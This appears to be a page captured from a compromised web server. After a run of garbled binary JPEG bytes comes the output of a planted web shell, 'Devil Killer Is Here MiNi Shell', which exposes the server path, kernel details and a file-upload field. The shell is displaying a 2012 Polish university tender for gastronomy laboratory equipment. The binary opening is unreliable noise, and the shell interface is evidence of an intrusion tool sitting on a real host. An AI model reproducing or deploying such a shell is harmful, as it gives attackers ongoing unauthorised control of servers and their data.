JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120906/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120906/333734-N-2012.html

<p class="kh_header"><b>Opole: Dostawa sprzętu do Laboratorium Inżynierii Gastronomicznej dla Politechniki Opolskiej, nr sprawy ZP/D/69/2012</b><br>
<b>Numer ogłoszenia: 333734 - 2012; data zamieszczenia: 06.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Opolska , ul. Prószkowska 76, 45-758 Opole, woj. opolskie, tel. 77 4498178 , 77 4498177, faks 77 4498180.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.po.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu do Laboratorium Inżynierii Gastronomicznej dla Politechniki Opolskiej, nr sprawy ZP/D/69/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa, wraz z instalacją, a w przypadku części I, II, III i VII również ze szkoleniem, fabrycznie nowego, nieeksploatowanego i niewadliwego sprzętu do Laboratorium Inżynierii Gastronomicznej dla Politechniki Opolskiej tj.: 

Część I :
Tab. 1 Torrymetr (1 kpl.)
Tab. 2 Miernik zawartości tłuszczu do dużych ryb (1 kpl.)

Część II 
Tab. 1 Napęd maszyny kuchennej wieloczynnościowej (1 kpl.)
Tab. 2 Przystawka do maszyny gastronomicznej do mielenia mięsa (1 kpl.)
Tab. 3  Przystawka do maszyny gastronomicznej do rozdrabniania jarzyn (1 kpl.)
Tab. 4  Przystawka do maszyny gastronomicznej do zagniatania ciasta  i ubijania piany (1 kpl.)
Tab. 5 Przystawka do maszyny gastronomicznej do nacinania  kotletów (1 kpl.)
Tab. 6	Funkcja krojenia frytek (1 kpl.)
Tab. 7 Funkcja tarcia serów (1 kpl.)
Tab. 8 Obieraczka do ziemniaków (1 kpl.)
Tab. 9 Separator obierzyn (1 kpl.)
Tab. 10 Kuter do mielenia mięsa i warzyw (1 kpl.)
Tab. 11 Kuchnia elektryczna 2- płytowa (1 kpl.)
Tab. 12 Frytownica elektryczna (1 kpl.)
Tab. 13 Piec konwekcyjno - parowy wraz z rusztami (1 kpl.)
Tab. 14 Piec do pieczenia pizzy (1 kpl.)
Tab. 15 Krajalnica (1 kpl.)
Tab. 16 Zmywarka do szkła i naczyń (1 kpl.)
Tab. 17 Szafa chłodnicza (1 kpl.)
Tab. 18 Szafa mroźnicza (1 kpl.)
Tab. 19 Schładzarko - zamrażarka szokowa (1 kpl.)

Część III
Tab. 1 Komora wędzarnicza gastronomiczna (1 kpl.)

Część IV
Tab. 1 Zamrażarka niskotemperaturowa (1 kpl.)

Część V
Tab. 1	 Waga precyzyjna (1 kpl.)
Tab. 2 pHmetr elektroniczny (1 kpl.)

Część VI
Tab. 1	 Wagosuszarka (1 kpl.)

Część VII
Tab. 1	 Teksturometr (1 kpl.)

zwanych dalej sprzętem.

Szczegółowy opis przedmiotu zamówienia określony został w wykazie rzeczowo-cenowym, stanowiącym:

- dla części I - załącznik nr 1a do SIWZ,
- dla części II - załącznik nr 1b do SIWZ,
- dla części III - załącznik nr 1c do SIWZ,
- dla części IV - załącznik nr 1d do SIWZ,
- dla części V - załącznik nr 1e do SIWZ,
- dla części VI - załącznik nr 1f do SIWZ,
- dla części VII - załącznik nr 1g do SIWZ,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.22.00.00-0, 38.00.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w celu potwierdzenia posiadania wiedzy i doświadczenia musi wykazać, że należycie wykonał, z zastrzeżeniem art. 26 ust. 2 b ustawy PZP, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:

dot. cz. I:  min. 2 dostawy sprzętu laboratoryjnego, każda o wartości brutto min. 40.000,- zł,
dot. cz. II:  min. 2 dostawy sprzętu do gastronomii, każda o wartości brutto min. 40.000,- zł,
dot. cz. III: min. 2 dostawy sprzętu do gastronomii, każda o wartości brutto min. 10.000,- zł,
dot. cz. IV: min. 2 dostawy sprzętu laboratoryjnego, każda o wartości brutto min. 10.000,- zł,
dot. cz. V: min. 2 dostawy sprzętu laboratoryjnego, każda o wartości brutto min. 5.000,- zł,
dot. cz. VI: min. 2 dostawy sprzętu laboratoryjnego, każda o wartości brutto min. 5.000,- zł,
dot. cz. VII: min. 2 dostawy sprzętu laboratoryjnego,każda o wartości brutto min. 40.000,- zł,

Uwaga: 
Wykonawca, który składa ofertę na jedną część, musi się wykazać dwoma dostawami, każda o wartości i rodzaju przedmiotu dostawy wymaganej dla tej części, na którą składa ofertę. Wykonawca, który składa ofertę na więcej niż jedną część, musi się wykazać dwoma dostawami, każda o wartości wymaganej dla tej części, dla której wymagana wartość jest najwyższa, przy uwzględnieniu wymaganego rodzaju przedmiotu dostawy.
Np. Składając ofertę na część I i VI musi się wykazać dwoma dostawami sprzętu laboratoryjnego, każda o wartości brutto min. 40.000 zł. Składając ofertę na część I i III i VI musi się wykazać dwoma dostawami sprzętu laboratoryjnego, każda o wartości brutto min. 40.000 zł oraz dwoma dostawami sprzętu do gastronomii, każda o wartości brutto min. 10.000 zł. Składając ofertę na wszystkie części musi się wykazać dwoma dostawami sprzętu laboratoryjnego, każda o wartości brutto min. 40.000 zł oraz dwoma dostawami sprzętu do gastronomii, każda o wartości brutto min. 40.000 zł.

Ocena spełnienia warunku dokonana zostanie na podstawie; 
a)	wykazu 
dot. cz. I:  min. 2 dostaw sprzętu laboratoryjnego, każda o wartości brutto min. 40.000,- zł,
dot. cz. II:  min. 2 dostaw sprzętu do gastronomii, każda o wartości brutto min. 40.000,- zł,
dot. cz. III: min. 2 dostaw sprzętu do gastronomii, każda o wartości brutto min. 10.000,- zł,
dot. cz. IV: min. 2 dostaw sprzętu laboratoryjnego, każda o wartości brutto min. 10.000,- zł,
dot. cz. V: min. 2 dostaw sprzętu laboratoryjnego, każda o wartości brutto min. 5.000,- zł,
dot. cz. VI: min. 2 dostaw sprzętu laboratoryjnego, każda o wartości brutto min. 5.000,- zł,
dot. cz. VII: min. 2 dostaw sprzętu laboratoryjnego, każda o wartości brutto min. 40.000,- zł,
wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - z tego okresu, przygotowane wg wzoru - załącznika nr 2 do SIWZ
b)	dokumentów potwierdzających, że dostawy wskazane w wykazie zostały wykonane należycie (np.: referencje, protokoły odbioru).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">wykaz rzeczowo-cenowy, sporządzony w oparciu o załącznik nr 1a, 1b, 1c, 1d, 1e, 1f lub 1g do SIWZ, w odniesieniu do części, na którą wykonawca składa ofertę</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wypełniony formularz ofertowy według załącznika nr 5 do SIWZ, 2. w przypadku, gdy ofertę podpisuje osoba, której prawo do reprezentowania wykonawcy nie wynika z dokumentu rejestrowego: pełnomocnictwo (w formie oryginału lub kopii poświadczonej notarialnie, 3. Jeżeli wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust 1 ustawy PZP (patrz pkt 9 SIWZ), polega na zasobach innych podmiotów, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów: a) pisemnego zobowiązania tych podmiotów do oddania do dyspozycji wykonawcy zasobów określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, umożliwiających wykonanie zamówienia, według załącznika nr 7 do SIWZ lub udowodnienia w inny sposób iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, np. przedłożenie zawartych umów czy oświadczeń; b) ponadto jeśli podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentu, o którym mowa w pkt 10.2 SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1 Zmiany umowy wymagają formy pisemnej pod rygorem nieważności.
2 Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, z zastrzeżeniem ust. 3.
3 Dopuszcza się zmianę istotnych postanowień zawartej umowy w następującym zakresie i przy spełnieniu następujących warunków:
1)	Zmiana przedmiotu umowy w zakresie parametrów technicznych Sprzętu jest możliwa wyłącznie w uzasadnionych przypadkach, za zgodą obu Stron umowy. Zmiana ta nie może powodować pogorszenia parametrów technicznych dostarczanego Sprzętu.
2)	Wydłużenie terminów realizacji umowy na wniosek Zamawiającego będzie możliwe wyłącznie w uzasadnionych przypadkach, po uzyskaniu zgody Wykonawcy.
3)	Wydłużenie terminów realizacji umowy na wniosek Wykonawcy będzie możliwe wyłącznie po uzyskaniu zgody Zamawiającego i będzie możliwe wyłącznie w sytuacji, gdy konieczność wydłużenia tego terminu wynika z przyczyn obiektywnych, tj. niezależnych od Wykonawcy.
4)	Skrócenie terminów realizacji umowy jest możliwe wyłącznie za zgodą obu Stron umowy.
5)	Zmniejszenie wartości umowy jest możliwe wyłącznie za zgodą obu Stron umowy. Zmiana taka nie może spowodować dostarczenia Sprzętu o gorszych parametrach technicznych niż przewidziane w wykazie rzeczowo - cenowym.
6)	Zmiany warunków serwisowych są możliwe wyłącznie w uzasadnionych przypadkach i wymagają zgody obu Stron umowy,
7)	Zmiany w zakresie warunków płatności są możliwe wyłącznie w uzasadnionych przypadkach i wymagają zgody obu Stron umowy.
8)	W przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu Stron umowy.
9)	Dopuszcza się zmiany umowy dotyczące poprawienia błędów i oczywistych omyłek słownych, literowych i liczbowych, zmiany układu graficznego umowy lub numeracji jednostek redakcyjnych, nie powodujące zmiany celu i istoty umowy, przy czym wymaga to zgody obu Stron umowy.
10)	Jeżeli w trakcie realizacji umowy zaistnieje konieczność dokonania uszczegółowienia, wykładni lub doprecyzowania poszczególnych zapisów umowy, nie powodujących zmiany celu i istoty umowy, dopuszcza się zmiany umowy w tym zakresie, przy czym wymaga to zgody obu Stron umowy.
11)	W przypadku wystąpienia siły wyższej  możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu Stron umowy. 
12)	W przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu Stron umowy.
10.4 Zmiany, o których mowa w ust. 3, nie mogą powodować zwiększenia wartości umowy i wymagają pozytywnej opinii osób, o których mowa w § 3 ust. 3.4. umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.po.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Politechnika Opolska, Sekcja Zamówień Publicznych, budynek nr 7, pokój 22 45 - 758 Opole, ul. Prószkowska 76.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2012 godzina 09:30, miejsce: Politechnika Opolska, Sekcja Zamówień Publicznych, budynek nr 7, pokój 22 45 - 758 Opole, ul. Prószkowska 76.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 4.2	Przedmiot zamówienia jest realizowany na potrzeby projektu współfinansowanego z Regionalnego Programu Operacyjnego województwa opolskiego na lata 2007-2013. Tytuł: Poprawa bazy dydaktycznej na 3 kluczowych wydziałach Politechniki Opolskiej w Opolu poprzez zakup i montaż elementów wyposażeniowych sal laboratoryjnych i wykładowych. Oś priorytetowa Infrastruktura społeczna i szkolnictwo wyższe. Działania Wsparcie regionalnej infrastruktury. Nr umowy RPO.05.01.01-16-003/11-00..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> część I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa, wraz z instalacją i szkoleniem, fabrycznie nowego, nieeksploatowanego i niewadliwego sprzętu do Laboratorium Inżynierii Gastronomicznej dla Politechniki Opolskiej tj.: 

Część I :
Tab. 1 Torrymetr (1 kpl)
Tab. 2 Miernik zawartości tłuszczu do dużych ryb (1 kpl)

Szczegółowy opis przedmiotu zamówienia określony został w wykazie rzeczowo-cenowym, stanowiącym załącznik nr 1a do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> część II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa, wraz z instalacją i szkoleniem, fabrycznie nowego, nieeksploatowanego i niewadliwego sprzętu do Laboratorium Inżynierii Gastronomicznej dla Politechniki Opolskiej tj.: 

Część II 
Tab. 1 Napęd maszyny kuchennej wieloczynnościowej (1kpl)
Tab. 2 Przystawka do maszyny gastronomicznej do mielenia mięsa (1 kpl)
Tab. 3  Przystawka do maszyny gastronomicznej do rozdrabniania jarzyn (1 kpl)
Tab. 4  Przystawka do maszyny gastronomicznej do zagniatania ciasta  i ubijania piany (1 kpl)
Tab. 5 Przystawka do maszyny gastronomicznej do nacinania  kotletów (1 kpl)
Tab. 6	Funkcja krojenia frytek (1 kpl)
Tab. 7 Funkcja tarcia serów (1kpl)
Tab. 8 Obieraczka do ziemniaków (1 kpl)
Tab. 9 Separator obierzyn (1 kpl)
Tab. 10 Kuter do mielenia mięsa i warzyw (1 kpl)
Tab. 11 Kuchnia elektryczna 2- płytowa (1 kpl)
Tab. 12 Frytownica elektryczna (1 kpl)
Tab. 13 Piec konwekcyjno - parowy wraz z rusztami (1 kpl)
Tab. 14 Piec do pieczenia pizzy (1 kpl)
Tab. 15 Krajalnica (1 kpl)
Tab. 16 Zmywarka do szkła i naczyń (1 kpl)
Tab. 17 Szafa chłodnicza (1 kpl)
Tab. 18 Szafa mroźnicza (1 kpl)
Tab. 19 Schładzarko - zamrażarka szokowa (1 kpl)

Szczegółowy opis przedmiotu zamówienia określony został w wykazie rzeczowo-cenowym, stanowiącym załącznik nr 1b do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> część III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa, wraz z instalacją i szkoleniem, fabrycznie nowego, nieeksploatowanego i niewadliwego sprzętu do Laboratorium Inżynierii Gastronomicznej dla Politechniki Opolskiej tj.: 

Część III
Tab. 1 Komora wędzarnicza gastronomiczna (1 kpl)

Szczegółowy opis przedmiotu zamówienia określony został w wykazie rzeczowo-cenowym, stanowiącym załącznik nr 1c do SIWZ,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> część IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa, wraz z instalacją, fabrycznie nowego, nieeksploatowanego i niewadliwego sprzętu do Laboratorium Inżynierii Gastronomicznej dla Politechniki Opolskiej tj.: 

Część IV
Tab. 1 Zamrażarka niskotemperaturowa (1 kpl)

Szczegółowy opis przedmiotu zamówienia określony został w wykazie rzeczowo-cenowym, stanowiącym załącznik nr 1d do SIWZ,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> część V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa, wraz z instalacją, fabrycznie nowego, nieeksploatowanego i niewadliwego sprzętu do Laboratorium Inżynierii Gastronomicznej dla Politechniki Opolskiej tj.: 


Część V
Tab. 1	 Waga precyzyjna (1 kpl)
Tab. 2 pHmetr elektroniczny (1 kpl)

Szczegółowy opis przedmiotu zamówienia określony został w wykazie rzeczowo-cenowym, stanowiącym załącznik nr 1e do SIWZ,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> część VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa, wraz z instalacją, fabrycznie nowego, nieeksploatowanego i niewadliwego sprzętu do Laboratorium Inżynierii Gastronomicznej dla Politechniki Opolskiej tj.: 

Część VI
Tab. 1	 Wagosuszarka (1 kpl)

Szczegółowy opis przedmiotu zamówienia określony został w wykazie rzeczowo-cenowym, stanowiącym załącznik nr 1f do SIWZ,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
